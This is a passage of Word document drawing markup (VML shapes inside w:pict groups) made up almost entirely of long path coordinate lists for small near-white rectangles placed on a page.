,2395,1292,2395,1291,2395,1291,2395,1290,2395,1289,2395,1288,2395,1288,2395,1287,2395,1286,2395,1285,2395,1284,2395,1283,2395,1282,2395,1281,2395,1280,2395,1278,2395,1277,2395,1276,2395,1274,2395,1273,2395,1272,2395,1270,2395,1269,2395,1267,2395,1265,2395,1264,2395,1262,2395,1260,2395,1258,2395,1256,2395,1254,2395,1252,2395,1250,2395,1248,2395,1245,2395,1243,2395,1241,2395,1238,2395,1236,2395,1233,2395,1231,2395,1228,2395,1225,2395,1222,2395,1219,2395,1216,2395,1213,2395,1210,2395,1207,2395,1203,2395,1200,2395,1196,2395,1193,2395,1189,2395,1186,2395,1182,2395,1178,2395,1174,2395,1170,2395,1166,2395,1161,2395,1157,2395,1153,2395,1148,2395,1144,2395,1139,2395,1134,2395,1129,2395,1124,2395,1119,2395,1114,2395,1109,2395,1104,2395,1098,2395,1093,2395,1087,2395,1081,2395,1075,2395,1069,2395,1063,2395,1057,2395,1051,2395,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:1030;width:130;height:270" coordorigin="2850,1030" coordsize="130,270" path="m2875,1045l2875,1045,2875,1045,2875,1045,2875,1045,2875,1045,2875,1045,2875,1045,2875,1045,2875,1045,2875,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2876,1045,2877,1045,2877,1045,2877,1045,2877,1045,2877,1045,2877,1045,2878,1045,2878,1045,2878,1045,2878,1045,2879,1045,2879,1045,2879,1045,2879,1045,2880,1045,2880,1045,2880,1045,2881,1045,2881,1045,2882,1045,2882,1045,2882,1045,2883,1045,2883,1045,2884,1045,2884,1045,2885,1045,2885,1045,2886,1045,2887,1045,2887,1045,2888,1045,2889,1045,2889,1045,2890,1045,2891,1045,2892,1045,2892,1045,2893,1045,2894,1045,2895,1045,2896,1045,2897,1045,2898,1045,2899,1045,2900,1045,2901,1045,2902,1045,2903,1045,2904,1045,2906,1045,2907,1045,2908,1045,2909,1045,2911,1045,2912,1045,2913,1045,2915,1045,2916,1045,2918,1045,2919,1045,2921,1045,2922,1045,2924,1045,2926,1045,2927,1045,2929,1045,2931,1045,2933,1045,2935,1045,2937,1045,2938,1045,2940,1045,2943,1045,2945,1045,2947,1045,2949,1045,2951,1045,2953,1045,2956,1045,2958,1045,2960,1045,2963,1045,2965,1045,2968,1045,2970,1045,2973,1045,2976,1045,2978,1045,2981,1045,2984,1045,2987,1045,2990,1045,2993,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1045,2996,1046,2996,1046,2996,1046,2996,1046,2996,1046,2996,1047,2996,1047,2996,1047,2996,1048,2996,1048,2996,1048,2996,1049,2996,1049,2996,1049,2996,1050,2996,1050,2996,1051,2996,1052,2996,1052,2996,1053,2996,1054,2996,1054,2996,1055,2996,1056,2996,1057,2996,1057,2996,1058,2996,1059,2996,1060,2996,1061,2996,1062,2996,1063,2996,1065,2996,1066,2996,1067,2996,1068,2996,1070,2996,1071,2996,1073,2996,1074,2996,1076,2996,1077,2996,1079,2996,1081,2996,1082,2996,1084,2996,1086,2996,1088,2996,1090,2996,1092,2996,1094,2996,1096,2996,1099,2996,1101,2996,1103,2996,1106,2996,1108,2996,1111,2996,1114,2996,1116,2996,1119,2996,1122,2996,1125,2996,1128,2996,1131,2996,1134,2996,1138,2996,1141,2996,1144,2996,1148,2996,1151,2996,1155,2996,1159,2996,1162,2996,1166,2996,1170,2996,1174,2996,1178,2996,1183,2996,1187,2996,1191,2996,1196,2996,1201,2996,1205,2996,1210,2996,1215,2996,1220,2996,1225,2996,1230,2996,1235,2996,1241,2996,1246,2996,1252,2996,1257,2996,1263,2996,1269,2996,1275,2996,1281,2996,1287,2996,1293,2996,1300,2996,1300,2996,1300,2996,1300,2996,1300,2996,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2995,1300,2994,1300,2994,1300,2994,1300,2994,1300,2994,1300,2994,1300,2993,1300,2993,1300,2993,1300,2993,1300,2992,1300,2992,1300,2992,1300,2992,1300,2991,1300,2991,1300,2991,1300,2990,1300,2990,1300,2989,1300,2989,1300,2989,1300,2988,1300,2988,1300,2987,1300,2987,1300,2986,1300,2985,1300,2985,1300,2984,1300,2984,1300,2983,1300,2982,1300,2982,1300,2981,1300,2980,1300,2979,1300,2979,1300,2978,1300,2977,1300,2976,1300,2975,1300,2974,1300,2973,1300,2972,1300,2971,1300,2970,1300,2969,1300,2968,1300,2967,1300,2965,1300,2964,1300,2963,1300,2962,1300,2960,1300,2959,1300,2958,1300,2956,1300,2955,1300,2953,1300,2952,1300,2950,1300,2949,1300,2947,1300,2945,1300,2944,1300,2942,1300,2940,1300,2938,1300,2936,1300,2934,1300,2932,1300,2930,1300,2928,1300,2926,1300,2924,1300,2922,1300,2920,1300,2918,1300,2915,1300,2913,1300,2911,1300,2908,1300,2906,1300,2903,1300,2901,1300,2898,1300,2895,1300,2893,1300,2890,1300,2887,1300,2884,1300,2881,1300,2878,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1300,2875,1299,2875,1299,2875,1299,2875,1299,2875,1299,2875,1299,2875,1299,2875,1299,2875,1299,2875,1298,2875,1298,2875,1298,2875,1298,2875,1298,2875,1297,2875,1297,2875,1297,2875,1296,2875,1296,2875,1296,2875,1295,2875,1295,2875,1294,2875,1294,2875,1293,2875,1293,2875,1292,2875,1291,2875,1291,2875,1290,2875,1289,2875,1288,2875,1288,2875,1287,2875,1286,2875,1285,2875,1284,2875,1283,2875,1282,2875,1281,2875,1280,2875,1278,2875,1277,2875,1276,2875,1274,2875,1273,2875,1272,2875,1270,2875,1269,2875,1267,2875,1265,2875,1264,2875,1262,2875,1260,2875,1258,2875,1256,2875,1254,2875,1252,2875,1250,2875,1248,2875,1245,2875,1243,2875,1241,2875,1238,2875,1236,2875,1233,2875,1231,2875,1228,2875,1225,2875,1222,2875,1219,2875,1216,2875,1213,2875,1210,2875,1207,2875,1203,2875,1200,2875,1196,2875,1193,2875,1189,2875,1186,2875,1182,2875,1178,2875,1174,2875,1170,2875,1166,2875,1161,2875,1157,2875,1153,2875,1148,2875,1144,2875,1139,2875,1134,2875,1129,2875,1124,2875,1119,2875,1114,2875,1109,2875,1104,2875,1098,2875,1093,2875,1087,2875,1081,2875,1075,2875,1069,2875,1063,2875,1057,2875,1051,2875,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:83.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,1670" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:1670;width:130;height:270" coordorigin="2370,1670" coordsize="130,270" path="m2395,1690l2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2395,1690,2396,1690,2396,1690,2396,1690,2396,1690,2396,1690,2396,1690,2396,1690,2396,1690,2396,1690,2396,1690,2397,1690,2397,1690,2397,1690,2397,1690,2397,1690,2398,1690,2398,1690,2398,1690,2398,1690,2399,1690,2399,1690,2399,1690,2399,1690,2400,1690,2400,1690,2400,1690,2401,1690,2401,1690,2402,1690,2402,1690,2403,1690,2403,1690,2404,1690,2404,1690,2405,1690,2405,1690,2406,1690,2406,1690,2407,1690,2408,1690,2408,1690,2409,1690,2410,1690,2411,1690,2411,1690,2412,1690,2413,1690,2414,1690,2415,1690,2416,1690,2417,1690,2418,1690,2419,1690,2420,1690,2421,1690,2422,1690,2423,1690,2424,1690,2425,1690,2426,1690,2428,1690,2429,1690,2430,1690,2432,1690,2433,1690,2434,1690,2436,1690,2437,1690,2439,1690,2441,1690,2442,1690,2444,1690,2445,1690,2447,1690,2449,1690,2451,1690,2453,1690,2454,1690,2456,1690,2458,1690,2460,1690,2462,1690,2464,1690,2466,1690,2469,1690,2471,1690,2473,1690,2475,1690,2478,1690,2480,1690,2482,1690,2485,1690,2487,1690,2490,1690,2493,1690,2495,1690,2498,1690,2501,1690,2504,1690,2506,1690,2509,1690,2512,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1690,2515,1691,2515,1691,2515,1691,2515,1691,2515,1691,2515,1691,2515,1692,2515,1692,2515,1692,2515,1693,2515,1693,2515,1693,2515,1694,2515,1694,2515,1694,2515,1695,2515,1695,2515,1696,2515,1696,2515,1697,2515,1698,2515,1698,2515,1699,2515,1700,2515,1700,2515,1701,2515,1702,2515,1703,2515,1704,2515,1705,2515,1706,2515,1707,2515,1708,2515,1709,2515,1710,2515,1711,2515,1712,2515,1714,2515,1715,2515,1716,2515,1718,2515,1719,2515,1721,2515,1723,2515,1724,2515,1726,2515,1728,2515,1730,2515,1731,2515,1733,2515,1735,2515,1737,2515,1740,2515,1742,2515,1744,2515,1746,2515,1749,2515,1751,2515,1754,2515,1756,2515,1759,2515,1762,2515,1764,2515,1767,2515,1770,2515,1773,2515,1776,2515,1780,2515,1783,2515,1786,2515,1790,2515,1793,2515,1797,2515,1800,2515,1804,2515,1808,2515,1812,2515,1816,2515,1820,2515,1824,2515,1828,2515,1832,2515,1837,2515,1841,2515,1846,2515,1851,2515,1855,2515,1860,2515,1865,2515,1870,2515,1875,2515,1881,2515,1886,2515,1891,2515,1897,2515,1903,2515,1908,2515,1914,2515,1920,2515,1926,2515,1932,2515,1939,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2515,1945,2514,1945,2514,1945,2514,1945,2514,1945,2514,1945,2514,1945,2514,1945,2513,1945,2513,1945,2513,1945,2513,1945,2512,1945,2512,1945,2512,1945,2512,1945,2511,1945,2511,1945,2511,1945,2510,1945,2510,1945,2510,1945,2509,1945,2509,1945,2508,1945,2508,1945,2507,1945,2507,1945,2506,1945,2506,1945,2505,1945,2505,1945,2504,1945,2503,1945,2503,1945,2502,1945,2501,1945,2501,1945,2500,1945,2499,1945,2498,1945,2497,1945,2497,1945,2496,1945,2495,1945,2494,1945,2493,1945,2492,1945,2491,1945,2490,1945,2489,1945,2488,1945,2486,1945,2485,1945,2484,1945,2483,1945,2481,1945,2480,1945,2479,1945,2477,1945,2476,1945,2475,1945,2473,1945,2472,1945,2470,1945,2468,1945,2467,1945,2465,1945,2463,1945,2462,1945,2460,1945,2458,1945,2456,1945,2454,1945,2452,1945,2450,1945,2448,1945,2446,1945,2444,1945,2442,1945,2440,1945,2437,1945,2435,1945,2433,1945,2430,1945,2428,1945,2426,1945,2423,1945,2420,1945,2418,1945,2415,1945,2412,1945,2410,1945,2407,1945,2404,1945,2401,1945,2398,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1945,2395,1944,2395,1944,2395,1944,2395,1944,2395,1944,2395,1944,2395,1944,2395,1943,2395,1943,2395,1943,2395,1943,2395,1942,2395,1942,2395,1942,2395,1941,2395,1941,2395,1940,2395,1940,2395,1940,2395,1939,2395,1938,2395,1938,2395,1937,2395,1937,2395,1936,2395,1935,2395,1935,2395,1934,2395,1933,2395,1932,2395,1931,2395,1930,2395,1929,2395,1928,2395,1927,2395,1926,2395,1925,2395,1924,2395,1922,2395,1921,2395,1920,2395,1918,2395,1917,2395,1915,2395,1914,2395,1912,2395,1911,2395,1909,2395,1907,2395,1905,2395,1903,2395,1901,2395,1899,2395,1897,2395,1895,2395,1893,2395,1891,2395,1888,2395,1886,2395,1884,2395,1881,2395,1879,2395,1876,2395,1873,2395,1870,2395,1867,2395,1865,2395,1862,2395,1858,2395,1855,2395,1852,2395,1849,2395,1845,2395,1842,2395,1838,2395,1835,2395,1831,2395,1827,2395,1823,2395,1819,2395,1815,2395,1811,2395,1807,2395,1802,2395,1798,2395,1794,2395,1789,2395,1784,2395,1780,2395,1775,2395,1770,2395,1765,2395,1760,2395,1754,2395,1749,2395,1743,2395,1738,2395,1732,2395,1727,2395,1721,2395,1715,2395,1709,2395,1702,2395,1696,2395,1690e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:83.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,1670" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:1670;width:130;height:270" coordorigin="2850,1670" coordsize="130,270" path="m2875,1690l2875,1690,2875,1690,2875,1690,2875,1690,2875,1690,2875,1690,2875,1690,2875,1690,2875,1690,2875,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2876,1690,2877,1690,2877,1690,2877,1690,2877,1690,2877,1690,2877,1690,2878,1690,2878,1690,2878,1690,2878,1690,2879,1690,2879,1690,2879,1690,2879,1690,2880,1690,2880,1690,2880,1690,2881,1690,2881,1690,2882,1690,2882,1690,2882,1690,2883,1690,2883,1690,2884,1690,2884,1690,2885,1690,2885,1690,2886,1690,2887,1690,2887,1690,2888,1690,2889,1690,2889,1690,2890,1690,2891,1690,2892,1690,2892,1690,2893,1690,2894,1690,2895,1690,2896,1690,2897,1690,2898,1690,2899,1690,2900,1690,2901,1690,2902,1690,2903,1690,2904,1690,2906,1690,2907,1690,2908,1690,2909,1690,2911,1690,2912,1690,2913,1690,2915,1690,2916,1690,2918,1690,2919,1690,2921,1690,2922,1690,2924,1690,2926,1690,2927,1690,2929,1690,2931,1690,2933,1690,2935,1690,2937,1690,2938,1690,2940,1690,2943,1690,2945,1690,2947,1690,2949,1690,2951,1690,2953,1690,2956,1690,2958,1690,2960,1690,2963,1690,2965,1690,2968,1690,2970,1690,2973,1690,2976,1690,2978,1690,2981,1690,2984,1690,2987,1690,2990,1690,2993,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1690,2996,1691,2996,1691,2996,1691,2996,1691,2996,1691,2996,1691,2996,1692,2996,1692,2996,1692,2996,1693,2996,1693,2996,1693,2996,1694,2996,1694,2996,1694,2996,1695,2996,1695,2996,1696,2996,1696,2996,1697,2996,1698,2996,1698,2996,1699,2996,1700,2996,1700,2996,1701,2996,1702,2996,1703,2996,1704,2996,1705,2996,1706,2996,1707,2996,1708,2996,1709,2996,1710,2996,1711,2996,1712,2996,1714,2996,1715,2996,1716,2996,1718,2996,1719,2996,1721,2996,1723,2996,1724,2996,1726,2996,1728,2996,1730,2996,1731,2996,1733,2996,1735,2996,1737,2996,1740,2996,1742,2996,1744,2996,1746,2996,1749,2996,1751,2996,1754,2996,1756,2996,1759,2996,1762,2996,1764,2996,1767,2996,1770,2996,1773,2996,1776,2996,1780,2996,1783,2996,1786,2996,1790,2996,1793,2996,1797,2996,1800,2996,1804,2996,1808,2996,1812,2996,1816,2996,1820,2996,1824,2996,1828,2996,1832,2996,1837,2996,1841,2996,1846,2996,1851,2996,1855,2996,1860,2996,1865,2996,1870,2996,1875,2996,1881,2996,1886,2996,1891,2996,1897,2996,1903,2996,1908,2996,1914,2996,1920,2996,1926,2996,1932,2996,1939,2996,1945,2996,1945,2996,1945,2996,1945,2996,1945,2996,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2995,1945,2994,1945,2994,1945,2994,1945,2994,1945,2994,1945,2994,1945,2993,1945,2993,1945,2993,1945,2993,1945,2992,1945,2992,1945,2992,1945,2992,1945,2991,1945,2991,1945,2991,1945,2990,1945,2990,1945,2989,1945,2989,1945,2989,1945,2988,1945,2988,1945,2987,1945,2987,1945,2986,1945,2985,1945,2985,1945,2984,1945,2984,1945,2983,1945,2982,1945,2982,1945,2981,1945,2980,1945,2979,1945,2979,1945,2978,1945,2977,1945,2976,1945,2975,1945,2974,1945,2973,1945,2972,1945,2971,1945,2970,1945,2969,1945,2968,1945,2967,1945,2965,1945,2964,1945,2963,1945,2962,1945,2960,1945,2959,1945,2958,1945,2956,1945,2955,1945,2953,1945,2952,1945,2950,1945,2949,1945,2947,1945,2945,1945,2944,1945,2942,1945,2940,1945,2938,1945,2936,1945,2934,1945,2932,1945,2930,1945,2928,1945,2926,1945,2924,1945,2922,1945,2920,1945,2918,1945,2915,1945,2913,1945,2911,1945,2908,1945,2906,1945,2903,1945,2901,1945,2898,1945,2895,1945,2893,1945,2890,1945,2887,1945,2884,1945,2881,1945,2878,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1945,2875,1944,2875,1944,2875,1944,2875,1944,2875,1944,2875,1944,2875,1944,2875,1943,2875,1943,2875,1943,2875,1943,2875,1942,2875,1942,2875,1942,2875,1941,2875,1941,2875,1940,2875,1940,2875,1940,2875,1939,2875,1938,2875,1938,2875,1937,2875,1937,2875,1936,2875,1935,2875,1935,2875,1934,2875,1933,2875,1932,2875,1931,2875,1930,2875,1929,2875,1928,2875,1927,2875,1926,2875,1925,2875,1924,2875,1922,2875,1921,2875,1920,2875,1918,2875,1917,2875,1915,2875,1914,2875,1912,2875,1911,2875,1909,2875,1907,2875,1905,2875,1903,2875,1901,2875,1899,2875,1897,2875,1895,2875,1893,2875,1891,2875,1888,2875,1886,2875,1884,2875,1881,2875,1879,2875,1876,2875,1873,2875,1870,2875,1867,2875,1865,2875,1862,2875,1858,2875,1855,2875,1852,2875,1849,2875,1845,2875,1842,2875,1838,2875,1835,2875,1831,2875,1827,2875,1823,2875,1819,2875,1815,2875,1811,2875,1807,2875,1802,2875,1798,2875,1794,2875,1789,2875,1784,2875,1780,2875,1775,2875,1770,2875,1765,2875,1760,2875,1754,2875,1749,2875,1743,2875,1738,2875,1732,2875,1727,2875,1721,2875,1715,2875,1709,2875,1702,2875,1696,2875,1690e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:115.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,2310" coordsize="130,250">
        <v:shape style="position:absolute;left:2370;top:2310;width:130;height:250" coordorigin="2370,2310" coordsize="130,250" path="m2395,2320l2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2395,2320,2396,2320,2396,2320,2396,2320,2396,2320,2396,2320,2396,2320,2396,2320,2396,2320,2396,2320,2396,2320,2397,2320,2397,2320,2397,2320,2397,2320,2397,2320,2398,2320,2398,2320,2398,2320,2398,2320,2399,2320,2399,2320,2399,2320,2399,2320,2400,2320,2400,2320,2400,2320,2401,2320,2401,2320,2402,2320,2402,2320,2403,2320,2403,2320,2404,2320,2404,2320,2405,2320,2405,2320,2406,2320,2406,2320,2407,2320,2408,2320,2408,2320,2409,2320,2410,2320,2411,2320,2411,2320,2412,2320,2413,2320,2414,2320,2415,2320,2416,2320,2417,2320,2418,2320,2419,2320,2420,2320,2421,2320,2422,2320,2423,2320,2424,2320,2425,2320,2426,2320,2428,2320,2429,2320,2430,2320,2432,2320,2433,2320,2434,2320,2436,2320,2437,2320,2439,2320,2441,2320,2442,2320,2444,2320,2445,2320,2447,2320,2449,2320,2451,2320,2453,2320,2454,2320,2456,2320,2458,2320,2460,2320,2462,2320,2464,2320,2466,2320,2469,2320,2471,2320,2473,2320,2475,2320,2478,2320,2480,2320,2482,2320,2485,2320,2487,2320,2490,2320,2493,2320,2495,2320,2498,2320,2501,2320,2504,2320,2506,2320,2509,2320,2512,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2320,2515,2321,2515,2321,2515,2321,2515,2321,2515,2321,2515,2321,2515,2321,2515,2321,2515,2322,2515,2322,2515,2322,2515,2322,2515,2323,2515,2323,2515,2323,2515,2323,2515,2324,2515,2324,2515,2325,2515,2325,2515,2326,2515,2326,2515,2327,2515,2327,2515,2328,2515,2328,2515,2329,2515,2330,2515,2331,2515,2331,2515,2332,2515,2333,2515,2334,2515,2335,2515,2336,2515,2337,2515,2338,2515,2339,2515,2340,2515,2341,2515,2343,2515,2344,2515,2345,2515,2347,2515,2348,2515,2350,2515,2351,2515,2353,2515,2355,2515,2356,2515,2358,2515,2360,2515,2362,2515,2364,2515,2366,2515,2368,2515,2370,2515,2372,2515,2374,2515,2377,2515,2379,2515,2382,2515,2384,2515,2387,2515,2389,2515,2392,2515,2395,2515,2398,2515,2401,2515,2404,2515,2407,2515,2410,2515,2413,2515,2416,2515,2420,2515,2423,2515,2427,2515,2431,2515,2434,2515,2438,2515,2442,2515,2446,2515,2450,2515,2454,2515,2458,2515,2463,2515,2467,2515,2472,2515,2476,2515,2481,2515,2486,2515,2490,2515,2495,2515,2500,2515,2506,2515,2511,2515,2516,2515,2522,2515,2527,2515,2533,2515,2539,2515,2544,2515,2550,2515,2556,2515,2563,2515,2569,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2515,2575,2514,2575,2514,2575,2514,2575,2514,2575,2514,2575,2514,2575,2514,2575,2513,2575,2513,2575,2513,2575,2513,2575,2512,2575,2512,2575,2512,2575,2512,2575,2511,2575,2511,2575,2511,2575,2510,2575,2510,2575,2510,2575,2509,2575,2509,2575,2508,2575,2508,2575,2507,2575,2507,2575,2506,2575,2506,2575,2505,2575,2505,2575,2504,2575,2503,2575,2503,2575,2502,2575,2501,2575,2501,2575,2500,2575,2499,2575,2498,2575,2497,2575,2497,2575,2496,2575,2495,2575,2494,2575,2493,2575,2492,2575,2491,2575,2490,2575,2489,2575,2488,2575,2486,2575,2485,2575,2484,2575,2483,2575,2481,2575,2480,2575,2479,2575,2477,2575,2476,2575,2475,2575,2473,2575,2472,2575,2470,2575,2468,2575,2467,2575,2465,2575,2463,2575,2462,2575,2460,2575,2458,2575,2456,2575,2454,2575,2452,2575,2450,2575,2448,2575,2446,2575,2444,2575,2442,2575,2440,2575,2437,2575,2435,2575,2433,2575,2430,2575,2428,2575,2426,2575,2423,2575,2420,2575,2418,2575,2415,2575,2412,2575,2410,2575,2407,2575,2404,2575,2401,2575,2398,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2575,2395,2574,2395,2574,2395,2574,2395,2574,2395,2574,2395,2573,2395,2573,2395,2573,2395,2573,2395,2572,2395,2572,2395,2572,2395,2571,2395,2571,2395,2570,2395,2570,2395,2569,2395,2569,2395,2568,2395,2568,2395,2567,2395,2566,2395,2566,2395,2565,2395,2564,2395,2563,2395,2562,2395,2562,2395,2561,2395,2560,2395,2559,2395,2557,2395,2556,2395,2555,2395,2554,2395,2553,2395,2551,2395,2550,2395,2549,2395,2547,2395,2546,2395,2544,2395,2543,2395,2541,2395,2539,2395,2537,2395,2536,2395,2534,2395,2532,2395,2530,2395,2528,2395,2526,2395,2523,2395,2521,2395,2519,2395,2516,2395,2514,2395,2511,2395,2509,2395,2506,2395,2503,2395,2501,2395,2498,2395,2495,2395,2492,2395,2489,2395,2486,2395,2482,2395,2479,2395,2476,2395,2472,2395,2469,2395,2465,2395,2461,2395,2457,2395,2454,2395,2450,2395,2445,2395,2441,2395,2437,2395,2433,2395,2428,2395,2424,2395,2419,2395,2415,2395,2410,2395,2405,2395,2400,2395,2395,2395,2390,2395,2385,2395,2379,2395,2374,2395,2368,2395,2363,2395,2357,2395,2351,2395,2345,2395,2339,2395,2333,2395,2327,2395,2320e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:115.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,2310" coordsize="130,250">
        <v:shape style="position:absolute;left:2850;top:2310;width:130;height:250" coordorigin="2850,2310" coordsize="130,250" path="m2875,2320l2875,2320,2875,2320,2875,2320,2875,2320,2875,2320,2875,2320,2875,2320,2875,2320,2875,2320,2875,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2876,2320,2877,2320,2877,2320,2877,2320,2877,2320,2877,2320,2877,2320,2878,2320,2878,2320,2878,2320,2878,2320,2879,2320,2879,2320,2879,2320,2879,2320,2880,2320,2880,2320,2880,2320,2881,2320,2881,2320,2882,2320,2882,2320,2882,2320,2883,2320,2883,2320,2884,2320,2884,2320,2885,2320,2885,2320,2886,2320,2887,2320,2887,2320,2888,2320,2889,2320,2889,2320,2890,2320,2891,2320,2892,2320,2892,2320,2893,2320,2894,2320,2895,2320,2896,2320,2897,2320,2898,2320,2899,2320,2900,2320,2901,2320,2902,2320,2903,2320,2904,2320,2906,2320,2907,2320,2908,2320,2909,2320,2911,2320,2912,2320,2913,2320,2915,2320,2916,2320,2918,2320,2919,2320,2921,2320,2922,2320,2924,2320,2926,2320,2927,2320,2929,2320,2931,2320,2933,2320,2935,2320,2937,2320,2938,2320,2940,2320,2943,2320,2945,2320,2947,2320,2949,2320,2951,2320,2953,2320,2956,2320,2958,2320,2960,2320,2963,2320,2965,2320,2968,2320,2970,2320,2973,2320,2976,2320,2978,2320,2981,2320,2984,2320,2987,2320,2990,2320,2993,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2320,2996,2321,2996,2321,2996,2321,2996,2321,2996,2321,2996,2321,2996,2321,2996,2321,2996,2322,2996,2322,2996,2322,2996,2322,2996,2323,2996,2323,2996,2323,2996,2323,2996,2324,2996,2324,2996,2325,2996,2325,2996,2326,2996,2326,2996,2327,2996,2327,2996,2328,2996,2328,2996,2329,2996,2330,2996,2331,2996,2331,2996,2332,2996,2333,2996,2334,2996,2335,2996,2336,2996,2337,2996,2338,2996,2339,2996,2340,2996,2341,2996,2343,2996,2344,2996,2345,2996,2347,2996,2348,2996,2350,2996,2351,2996,2353,2996,2355,2996,2356,2996,2358,2996,2360,2996,2362,2996,2364,2996,2366,2996,2368,2996,2370,2996,2372,2996,2374,2996,2377,2996,2379,2996,2382,2996,2384,2996,2387,2996,2389,2996,2392,2996,2395,2996,2398,2996,2401,2996,2404,2996,2407,2996,2410,2996,2413,2996,2416,2996,2420,2996,2423,2996,2427,2996,2431,2996,2434,2996,2438,2996,2442,2996,2446,2996,2450,2996,2454,2996,2458,2996,2463,2996,2467,2996,2472,2996,2476,2996,2481,2996,2486,2996,2490,2996,2495,2996,2500,2996,2506,2996,2511,2996,2516,2996,2522,2996,2527,2996,2533,2996,2539,2996,2544,2996,2550,2996,2556,2996,2563,2996,2569,2996,2575,2996,2575,2996,2575,2996,2575,2996,2575,2996,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2995,2575,2994,2575,2994,2575,2994,2575,2994,2575,2994,2575,2994,2575,2993,2575,2993,2575,2993,2575,2993,2575,2992,2575,2992,2575,2992,2575,2992,2575,2991,2575,2991,2575,2991,2575,2990,2575,2990,2575,2989,2575,2989,2575,2989,2575,2988,2575,2988,2575,2987,2575,2987,2575,2986,2575,2985,2575,2985,2575,2984,2575,2984,2575,2983,2575,2982,2575,2982,